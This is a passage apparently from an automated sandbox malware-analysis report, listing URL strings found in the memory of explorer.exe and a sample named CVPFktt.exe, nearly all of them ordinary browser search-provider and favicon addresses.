Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: CVPFktt.exe, 00000005.00000003.782541250.0000000000ADC000.00000004.00000001.sdmp	String found in binary or memory: http://mcc.avast.com
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000014.00000000.917616160.000000000E880000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000014.00000000.917616160.000000000E880000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000014.00000000.914582302.000000000AC96000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000014.00000000.914582302.000000000AC96000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000014.00000000.914582302.000000000AC96000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000014.00000000.914582302.000000000AC96000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000014.00000000.914582302.000000000AC96000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000014.00000000.914582302.000000000AC96000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000014.00000000.914582302.000000000AC96000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000014.00000000.914582302.000000000AC96000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000014.00000002.982359410.0000000005171000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: explorer.exe, 00000014.00000002.982359410.0000000005171000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp#
Source: explorer.exe, 00000014.00000002.982359410.0000000005171000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp$
Source: explorer.exe, 00000014.00000000.912661873.0000000006DB0000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpLMEMh
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
